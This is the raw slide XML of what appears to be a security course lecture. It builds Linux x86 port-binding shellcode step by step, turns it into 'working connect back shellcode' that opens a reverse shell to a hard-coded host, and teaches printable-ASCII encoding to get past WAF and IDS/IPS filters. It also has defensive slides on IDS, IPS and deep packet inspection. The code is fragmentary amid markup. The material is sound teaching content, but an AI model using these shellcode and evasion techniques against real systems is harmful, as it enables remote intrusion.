            <a:ext cy="1612500" cx="1394400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Towards (port-binding) shellcode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know how to call socketcall()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know what the sockaddr_in struct should look like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Now we need to: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bind to port 31337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listen to port 31337 for incoming connections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accept TCP connections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shellcode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y="1603050" x="4572000"/>
            <a:ext cy="4989300" cx="447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1447800" x="457200"/>
            <a:ext cy="4967700" cx="41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y="1878136" x="3945950"/>
            <a:ext cy="4733137" cx="701925"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path w="28077" extrusionOk="0" h="182500">
                <a:moveTo>
                  <a:pt y="182500" x="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt y="180033" x="2972"/>
                  <a:pt y="178390" x="14544"/>
                  <a:pt y="167703" x="17833"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="157016" x="21121"/>
                  <a:pt y="141838" x="19350"/>
                  <a:pt y="118378" x="19730"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="94917" x="20109"/>
                  <a:pt y="46667" x="18718"/>
                  <a:pt y="26938" x="20110"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="7208" x="21501"/>
                  <a:pt y="4489" x="26749"/>
                  <a:pt y="0" x="28077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lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="stealth"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="Shape 377"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5757675" x="5036800"/>
            <a:ext cy="1024433" cx="4202063"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal2">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent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Breathe deep.  Don't panic!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(reminder) The shellcode mimics this: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y="1600200" x="5111400"/>
            <a:ext cy="1347000" cx="392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These familiar socket functions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all can be accessed with a single Linux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system call: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socketcall()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algn="r" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng" b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>syscall number 102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y="1603050" x="4572000"/>
            <a:ext cy="4989300" cx="447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447800" x="457200"/>
            <a:ext cy="4967700" cx="41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y="1878136" x="3945950"/>
            <a:ext cy="4733137" cx="701925"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path w="28077" extrusionOk="0" h="182500">
                <a:moveTo>
                  <a:pt y="182500" x="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt y="180033" x="2972"/>
                  <a:pt y="178390" x="14544"/>
                  <a:pt y="167703" x="17833"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="157016" x="21121"/>
                  <a:pt y="141838" x="19350"/>
                  <a:pt y="118378" x="19730"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="94917" x="20109"/>
                  <a:pt y="46667" x="18718"/>
                  <a:pt y="26938" x="20110"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="7208" x="21501"/>
                  <a:pt y="4489" x="26749"/>
                  <a:pt y="0" x="28077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dot"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="stealth"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="393" name="Shape 393"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="394" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="4477124" x="3926978"/>
            <a:ext cy="1939800" cx="39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94" name="Shape 394"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6032775" x="4325378"/>
            <a:ext cy="768299" cx="4809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sz="1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socket(2,1,0) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Disassembly view recap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01" name="Shape 401"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="402" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3879575" x="3718187"/>
            <a:ext cy="99600" cx="197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y="3120725" x="5691287"/>
            <a:ext cy="1716900" cx="319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mov DWORD PTR [esp+8], 0x0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mov DWORD PTR [esp+4], 0x1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mov DWORD PTR [esp], 0x2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call   0x8048394 &lt;socket@plt&gt;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....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4277950" x="6127625"/>
            <a:ext cy="682799" cx="25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Arguments are pushed on the stack in reverse order,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so PF_INET = 2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and SOCK_STREAM =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98437" x="457200"/>
            <a:ext cy="1385099" cx="2601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(TCP)</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2400" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>Stateful </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2400" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>packet inspection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192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 rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>drop 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/>
              <a:t>packets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/>
              <a:t>violating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/>
              <a:t>TCP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"/>
              <a:t>state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>machine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599" x="2501900"/>
            <a:ext cy="6695169" cx="633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1603050" x="4572000"/>
            <a:ext cy="4989300" cx="447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y="1447800" x="457200"/>
            <a:ext cy="4967700" cx="41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y="6032775" x="4325378"/>
            <a:ext cy="768299" cx="4809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sz="1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sockaddr_in host_addr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bind(s, [2, 31337, 0], 16)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Debugger view recap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&lt;sys/socket.h&gt;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&lt;netinit/in.h&gt;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#include &lt;arpa/inet.h&gt;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int main(void) {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sockfd, new_sockfd; //listen on sock_fd, new connections on new_sockfd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struct sockaddr_in host_addr, client_addr; // my address info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socklen_t sin_size;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int yes=1;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sockfd = socket(PF_INET, SOCK_STREAM, 0);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host_addr.sin_family = AF_INET; 		//host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host_addr.sin_port = htons(31337);		// short, network byte order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host_addr.sin_addr.s_addr = INADDR_ANY;	// automatically fill with my IP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memset(&amp;(host_addr.sin_zero), '\0', 8); // zero the rest of the struct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bind(sockfd, (struct sockaddr *)&amp;host_addr, sizeof(struct sockaddr));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listen(sockfd, 4);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sin_size = sizeof(struct sockaddr_in);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	new_sockfd = accept(sockfd, (struct sockaddr *)&amp;client_addr, &amp;sin_size);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18" name="Shape 418"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="2684375" x="1024425"/>
            <a:ext cy="2760299" cx="4230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1100" x="1044025"/>
            <a:ext cy="971550" cx="76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y="2949975" x="5097723"/>
            <a:ext cy="2532600" cx="399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1200" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>host_addr is a sockaddr_in struct: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accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>struct sockaddr_in {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short            sin_family;   // e.g. AF_INET, AF_INET6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unsigned short   sin_port;     // e.g. htons(3490)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struct in_addr   sin_addr;     // see struct in_addr, below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    char             sin_zero[8];  // zero this if you want to</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1200" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr sz="1200" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill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y="1603050" x="4572000"/>
            <a:ext cy="4989300" cx="447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447800" x="457200"/>
            <a:ext cy="4967700" cx="41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y="6032775" x="4325378"/>
            <a:ext cy="768299" cx="4809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listen(sockfd, 4);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Piece by piece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y="1603050" x="4572000"/>
            <a:ext cy="4989300" cx="447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;CONTINUED FROM bind(s, [2, 31337, 0], 16)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listen(s,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4 = SYS_LISTEN = listen()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ebx          ; argv: { backlog = 4,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int 0x80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600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="800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1447800" x="457200"/>
            <a:ext cy="4967700" cx="41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bind(s, [2, 31337, 0], 16)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sockaddr struct:  INADDR_ANY = 0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y="6032775" x="4325378"/>
            <a:ext cy="768299" cx="4809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This sets up:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
            </a:b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new_sockfd = accept(sockfd, (struct sockaddr *)&amp;client_addr, &amp;sin_size);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shellcode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binds to port 31337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waits for incoming connections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blocking at the accept call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When connection is accepted the new socket file descriptor is stored in EAX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but doesn't do anything more!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we need to tie the file descriptor with a shell eventually</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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cue talk on: dup2()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 dup2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DUP(2)                     Linux Programmer's Manual                    DUP(2)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NAME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dup, dup2, dup3 - duplicate a file descriptor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SYNOPSIS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#include &lt;unistd.h&gt;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int dup(int oldfd);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sz="1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1400" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>int dup2(int oldfd, int newfd);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#define _GNU_SOURCE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#include &lt;unistd.h&gt;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int dup3(int oldfd, int newfd, int flags);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DESCRIPTION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These system calls create a copy of the file descriptor oldfd.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dup()  uses  the lowest-numbered unused descriptor for the new descrip‐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       tor.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000" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>       dup2() makes newfd be the copy of oldfd, closing newfd first if  neces‐</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1000" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>       sary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shell-spawning port binding shellcode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1600200" x="457200"/>
            <a:ext cy="4967700" cx="411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.... same as before   .......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c = accept(s, 0,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BYTE al, 0x66 ; socketcall (syscall #102)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inc ebx           ; ebx = 5 = SYS_ACCEPT = accept()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argv: { socklen = 0,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        sockaddr ptr = NULL,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esi          ;         socket fd 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int 0x80          ; eax = connected socket FD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2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1600200" x="4570200"/>
            <a:ext cy="4967700" cx="448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eax      ; move socket FD in ebx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0x3F   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xor ecx, ecx      ; ecx = 0 = standard input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1 = standard output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1)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2 = standard error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2)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execve(const char *filename, char *const argv [], char *const envp[])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11   ; execve  syscall #11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some nulls for string termination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0x68732f2f   ; push "//sh" to the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0x6e69622f   ; push "/bin" to the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esp      ; put the address of "/bin//sh" into ebx, via esp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32-bit null terminator to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edx, esp      ; this is an empty array for envp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ebx          ; push string addr to stack above null terminator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ecx, esp      ; this is the argv array with string ptr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execve("/bin//sh", ["/bin//sh", NULL], [NULL])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result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1600200" x="457200"/>
            <a:ext cy="4967700" cx="41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The added code duplicates this socket into the standard I/O file descriptors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0 = standard in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1 = standard out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2 = standard error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So when connections are accepted, these file descriptors are created, to handle /bin/sh for the socket.</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1400" lang="en"/>
            </a:b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can only handle one connection, then closes.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This is messy!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Lots of dup2 calls on the right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"/>
              <a:t>we need to clean this up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-317500" marL="137160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400" lang="en"/>
              <a:t>Branching control structures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="462" name="Shape 462"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1600200" x="4570200"/>
            <a:ext cy="4967700" cx="448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eax      ; move socket FD in ebx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0x3F   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xor ecx, ecx      ; ecx = 0 = standard input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1 = standard output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1)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2 = standard error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2)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execve(const char *filename, char *const argv [], char *const envp[])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11   ; execve  syscall #11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some nulls for string termination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0x68732f2f   ; push "//sh" to the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0x6e69622f   ; push "/bin" to the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esp      ; put the address of "/bin//sh" into ebx, via esp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edx          ; push 32-bit null terminator to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edx, esp      ; this is an empty array for envp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ebx          ; push string addr to stack above null terminator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ecx, esp      ; this is the argv array with string ptr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execve("/bin//sh", ["/bin//sh", NULL], [NULL])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Branching Control Structures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 programming structures like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for loops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if-then-else blocks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while loops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Rewritten as a small loop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1600200" x="457200"/>
            <a:ext cy="4967700" cx="411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ebx, eax      ; move socket FD in ebx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0x3F    ; dup2  syscall #63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xor ecx, ecx      ; ecx = 0 = standard input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0)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1 = standard output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1)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inc ecx           ; ecx = 2 = standard error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dup(c, 2)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>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1600200" x="4570200"/>
            <a:ext cy="4967700" cx="455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xchg eax, ebx     ; put socket FD in ebx and 0x00000005 in eax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push BYTE 0x2     ; ecx starts at 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pop ecx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"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dup_loop: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0x80          ; dup2(c,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dec ecx           ; count down to 0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jns dup_loop      ; if the sign flag is not set, ecx is not negative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y="4723775" x="3651900"/>
            <a:ext cy="1583999" cx="441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Cuts down on some size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important note:  xchg swaps &lt;reg1&gt; and &lt;reg2&gt; using EBX as the pivot/swap-register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IDS / IPS Deep Packet Inspection (DPI)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b="1" sz="1800" lang="en"/>
              <a:t>Deep Packet Inspection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-3429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search packet data + IP + TCP/UDP headers for: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protocol noncompliance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viruses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spam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intrusions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-3429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commonly used by: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enterprise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ISP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govts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-3429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Allows for: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eavesdropping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data mining</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-342900" marL="13716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censorship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DPI on its own, combines the functionality of IDS/IPS &amp; a traditional stateful firewall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3761825" x="3227279"/>
            <a:ext cy="725999" cx="204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See:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr u="sng" sz="1200" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://en.wikipedia.org/wiki/Deep_packet_inspection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Going from port binding to connect back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1600200" x="457200"/>
            <a:ext cy="4967700" cx="405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Port binding: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setup socket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bind to socket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listen for connections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accept connections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handle standard file I/O descriptors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spawn shell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2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1600200" x="4630800"/>
            <a:ext cy="4967700" cx="405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Connect back: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setup socket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Connect back to attacker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handle standard file I/O descriptors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spawn shell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==smaller shellcode!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we change this to connect back?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Only involves changing two lines of the ASM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seriously!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.... seriously!!!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 the bind() block of ASM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and removing listen() and accept()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so remove two blocks of ASM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Working connect back shellcode </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(targets 192.168.1.161)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y="1417650" x="457200"/>
            <a:ext cy="4967700" cx="416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BITS 32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; s = socket(2, 1, 0)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BYTE 0x66    ; socketcall is syscall #102 (0x66)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cdq               ; zero out edx for use as a null DWORD later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xor ebx, ebx      ; ebx is the type of socketcall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inc ebx           ; 1 = SYS_SOCKET = socket() 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edx          ; Build arg array: { protocol = 0,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BYTE 0x1     ;   (in reverse)     SOCK_STREAM = 1,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BYTE 0x2     ;                    AF_INET = 2 }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mov ecx, esp      ; ecx = ptr to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int 0x80          ; after syscall, eax has socket file descriptor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mov esi, eax      ; save socket FD in esi for later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; connect(s, [2, 31337, &lt;IP ADDR&gt;], 16)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BYTE 0x66    ; socketcall (syscall #102) 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pop eax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xor ebx, ebx;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inc ebx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inc ebx           ; ebx = 2 = SYS_BIND = bind()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8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8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push DWORD 0xa101a8c0 ; hex representation for 192.168.1.161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WORD 0x697a  ;   (in reverse order)    PORT = 31337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WORD bx      ;                         AF_INET = 2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mov ecx, esp      ; ecx = server struct pointer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BYTE 16      ; argv: { sizeof(server struct) = 16,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ecx          ;         server struct pointer,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push esi          ;         socket file descriptor }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mov ecx, esp      ; ecx = argument array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sz="8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inc ebx	    ; ebx = 3 = SYS_CONNECT = connect()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="700" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  int 0x80          ; eax = 0 on success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y="1600200" x="4792700"/>
            <a:ext cy="4967700" cx="416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;success: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dup2(connected socket, {all three standard I/O file descriptors})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xchg esi, ebx     ; put socket FD from esi into ebx (esi = 3)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xchg ecx, esi     ; ecx = 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dec ecx           ; ecx starts at 2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dup_loop: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BYTE al, 0x3F ; dup2  syscall #63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int 0x80          ; dup2(c, 0)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dec ecx           ; count down to 0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jns dup_loop      ; if the sign flag is not set, ecx is not negative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; execve(const char *filename, char *const argv [], char *const envp[])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BYTE al, 11   ; execve  syscall #11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push some nulls for string termination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0x68732f2f   ; push "//sh" to the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0x6e69622f   ; push "/bin" to the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ebx, esp      ; put the address of "/bin//sh" into ebx, via esp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edx          ; push 32-bit null terminator to stack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edx, esp      ; this is an empty array for envp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push ebx          ; push string addr to stack above null terminator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mov ecx, esp      ; this is the argv array with string ptr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  int 0x80          ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])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Encoded shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="502" name="Shape 502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Bypassing WAF ASCII filters &amp; IDS/IPS detection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attack something thats behind a WAF, IDS / IPS, AND Firewall?????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regulations mandate (in many industries) the companies either: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do regular code auditing of their software to get rid of bugs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establish a WAF, IDS / IPS instead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still will be vulnerabilities!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="3" indent="-342900" marL="1828800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>its like sweeping them under the rug!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So if its behind a WAF, its likely not code audited....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vulnerabilities ++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 time! Italian potato governor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There was once a italian governor that wanted to introduce potatoes to the daily lives of his citizens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they were cheap and easy to grow.  Good for business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Italians didn't want any part of it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Even gave them away for free!!! No one wanted them....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 he played on human logic..... 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68960" x="6449585"/>
            <a:ext cy="1789040" cx="269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(Not-so) Great Potato Heists!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gov put guards around carts of potatoes in the marketplace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people collectively began to think, well if they're being guarded they must be worth something!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 when the guards took their breaks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people began stealing potatoes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and raving about them "Man these things are great!"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Lesson here:  Putting defenses up may naturally drive more people to attack it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	-which is a motivation in honeypots :D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Buffer restrictions on a web application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Often caused by a WAF filter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Usually filter for data types other than expected (data sanity checking)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ASCII only input for string buffers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numerical only input for integers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etc...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Mitigates many attacks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Polymorphic printable ASCII shellcode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Polymorphic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refers to any code that modifies itself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we've worked with this some already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need NOP sleds that are printable ASCII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/>
              <a:t>We need ways to zero out registers with printable ASCII opcodes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And encoders / decoders that are printable ASCII as well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ASCII range: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0x33 to 0x7e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0x33 to 0x7e</a:t>
            </a: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total set of valid opcodes here is rather small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would be insane to write complex shellcode using a small instruction set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instead we find some way such that the printable opcodes modify the rest of the shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540" name="Shape 540"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5169575" x="469500"/>
            <a:ext cy="559499" cx="8204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ASCII NOP sled			ASCII Shellcode Decoder  			Encoded ASCII shellcode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y="5179075" x="2447250"/>
            <a:ext cy="569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2" name="Shape 542"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5179075" x="5571450"/>
            <a:ext cy="569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43" name="Shape 543"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4628529" x="4979875"/>
            <a:ext cy="550550" cx="1005450"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path w="40218" extrusionOk="0" h="22022">
                <a:moveTo>
                  <a:pt y="22022" x="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt y="18354" x="3414"/>
                  <a:pt y="142" x="13786"/>
                  <a:pt y="16" x="20489"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="-110" x="27192"/>
                  <a:pt y="17721" x="36929"/>
                  <a:pt y="21263" x="40218"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="accent4"/>
            </a:solidFill>
            <a:prstDash val="dot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DPI easily defeated by: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Compression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Encoding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Encryption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tunneling (sometimes)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0x33 to 0x7e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Useful stuff that renders as printable ascii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push esp 		; prints as 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pop eax		; prints as X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sub eax, 0x39393333 	; prints as "-3399"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sub eax, 0x72727550	; prints as "-Purr"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sub eax, 0x54545421	; prints as "-!TTT"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sub eax, 0x41414141	; prints as "-AAAA"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push eax		; prints as P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pop esp		; prints as \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and eax, 0x454e4f4a	; prints as "%JONE"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and eax, 0x3a313035	; prints as "%501:"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and eax, 0x41414141	; prints as "%AAAA"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Zeroing out registers</a:t>
            </a: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and eax, 0x454e4f4a	; prints as "%JONE"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and eax, 0x3a313035	; prints as "%501:"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and eax, 0x41414141	; prints as "%AAAA"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-419100" marL="45720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Instructions like these can be used to zero out a register, if the value's being AND-ed are inverses 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share no 1's in common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01  AND 10 == 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-419100" marL="45720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0x45e4f4a   AND    0x3a313035 == 0x000000!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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"%JONE%501:" will zero out EAX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Then....</a:t>
            </a:r>
          </a:p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There are two ways to proceed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use these crazy opcodes to build shellcode on the stack from scratch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use these opcodes to *decode* the rest of the payload...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AutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>shell spawning shellcode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#2 conceptually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have useful instructions like these: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sub eax, 0x39393333 	; prints as "-3399"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sub eax, 0x72727550	; prints as "-Purr"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sub eax, 0x54545421	; prints as "-!TTT"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sub eax, 0x41414141	; prints as "-AAAA"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-419100" marL="45720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we do with our shellcode, is take the raw bytes, and increment them by some combination of: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0x39393333, 0x72727550, 0x54545421, 0x41414141 and so on, until they are in the "printable" ASCII range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#2 conceptually</a:t>
            </a:r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Then, once everything is in the printable ascii range, it will bypass any ASCII filter (i.e. on the WAF).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Then use these instructions to *decode* the encoded payload!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sub eax, 0x39393333 	; prints as "-3399"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sub eax, 0x72727550	; prints as "-Purr"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sub eax, 0x54545421	; prints as "-!TTT"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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sub eax, 0x41414141	; prints as "-AAAA"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we get shellcode like:</a:t>
            </a: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simple shell-spawning shellcode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Networking shellcode gets really tricky here.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77566" x="334863"/>
            <a:ext cy="921884" cx="858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005799" x="7086600"/>
            <a:ext cy="1562100" cx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you need to know</a:t>
            </a:r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this works conceptually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that there are tools out there that automate this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msfencode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its more of an art than a science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Readings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Required:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-419100" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Read Chapter 12 in WAHH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-419100" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Read 0x550 in HAOE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[Optional] Suggested:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-419100" marL="9144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>
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Related Video (IDS/IPS Detection, Evasion, VOIP hacking):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http://www.youtube.com/watch?v=tJsNu0VRKYY&amp;feature=related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6587" x="776287"/>
            <a:ext cy="5153025" cx="75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Primarily focused on identifying *possible* incidents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log info about them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reporting all attempts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Secondary uses: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identifying problems with security policies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Documenting existing threats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deterring insider threats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IPS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Same as IDS but will kill traffic when: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when threats are detected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when policies are violated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like a firewall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